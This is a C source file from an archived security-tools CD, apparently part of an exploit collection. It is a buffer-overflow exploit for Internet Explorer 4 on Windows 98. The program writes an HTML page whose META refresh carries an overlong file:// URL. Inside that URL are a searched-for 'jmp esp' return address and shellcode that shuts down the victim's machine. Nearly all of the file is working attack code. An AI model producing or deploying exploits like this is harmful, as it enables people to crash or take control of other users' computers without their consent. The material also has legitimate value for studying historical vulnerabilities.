home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webbrowser / IE / ie4filex.c

< prev

next >

Wrap

C/C++ Source or Header  |  2005-02-12  |  3KB  |  87 lines

---

1. /*=============================================================================
2.    Microsoft IE4 for Windows98 exploit
3.    The Shadow Penguin Security (http://shadowpenguin.backsection.net)
4.    Written by UNYUN (shadowpenguin@backsection.net)
5.   =============================================================================
6. */
7.  
8. #include    <stdio.h>
9. #include    <windows.h>
10.  
11. #define     MAXBUF          1000
12. #define     RETADR          53
13.  
14.  
15. unsigned int mems[]={
16. 0xbfe30000,0xbfe43000,0xbfe80000,0xbfe86000,
17. 0xbfe90000,0xbfe96000,0xbfea0000,0xbfeb0000,
18. 0xbfee0000,0xbfee5000,0xbff20000,0xbff47000,
19. 0xbff50000,0xbff61000,0xbff70000,0xbffc6000,
20. 0xbffc9000,0xbffe3000,0,0};
21.  
22. unsigned char   exploit_code[200]={
23. 0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50,
24. 0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48,
25. 0xFF,0xD0,0x00,
26. };
27.  
28. unsigned int search_mem(FILE *fp,unsigned char *st,unsigned char *ed,
29.                 unsigned char c1,unsigned char c2)
30. {
31.     unsigned char   *p;
32.     unsigned int    adr;
33.  
34.     for (p=st;p<ed;p++)
35.         if (*p==c1 && *(p+1)==c2){
36.             adr=(unsigned int)p;
37.             if ((adr&0xff)==0) continue;
38.             if (((adr>>8)&0xff)==0) continue;
39.             if (((adr>>16)&0xff)==0) continue;
40.             if (((adr>>24)&0xff)==0) continue;
41.             return(adr);
42.         }
43.     return(0);
44.  
45. }
46.  
47.  
48. main(int argc,char *argv[])
49. {
50.     FILE                    *fp;
51.     unsigned int            i,ip;
52.     unsigned char           buf[MAXBUF];
53.  
54.     if (argc<2){
55.         printf("usage %s output_htmlfile\n",argv[0]);
56.         exit(1);
57.     }
58.     if ((fp=fopen(argv[1],"wb"))==NULL) return FALSE;   
59.     fprintf(fp,"<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0;URL=file://test/");
60.     for (i=0;;i+=2){
61.         if (mems[i]==0){
62.             printf("Can not find jmp code.\n");
63.             exit(1);
64.         }
65.         if ((ip=search_mem(fp,(unsigned char *)mems[i],
66.             (unsigned char *)mems[i+1],0xff,0xe4))!=0) break;
67.     }
68.     printf("Jumping address : %x\n",ip);
69.     memset(buf,0x41,MAXBUF);
70.     
71.     buf[RETADR-1]=0x90;
72.     buf[RETADR  ]=ip&0xff;
73.     buf[RETADR+1]=(ip>>8)&0xff;
74.     buf[RETADR+2]=(ip>>16)&0xff;
75.     buf[RETADR+3]=(ip>>24)&0xff;
76.  
77.     memcpy(buf+80,exploit_code,strlen(exploit_code));
78.     buf[MAXBUF]=0;
79.     fprintf(fp,"%s/\">\n<HTML><B>",buf);
80.     fprintf(fp,"10 seconds later, this machine will be shut down.</B><BR><BR>");
81.     fprintf(fp,"If you are using IE4 for Japanese Windows98, ");
82.     fprintf(fp,"maybe, the exploit code which shuts down your machine will be executed.<BR>");
83.     fprintf(fp,"</HTML>\n");
84.     fclose(fp);
85.     printf("%s created.\n",argv[1]);
86.     return FALSE;
87. }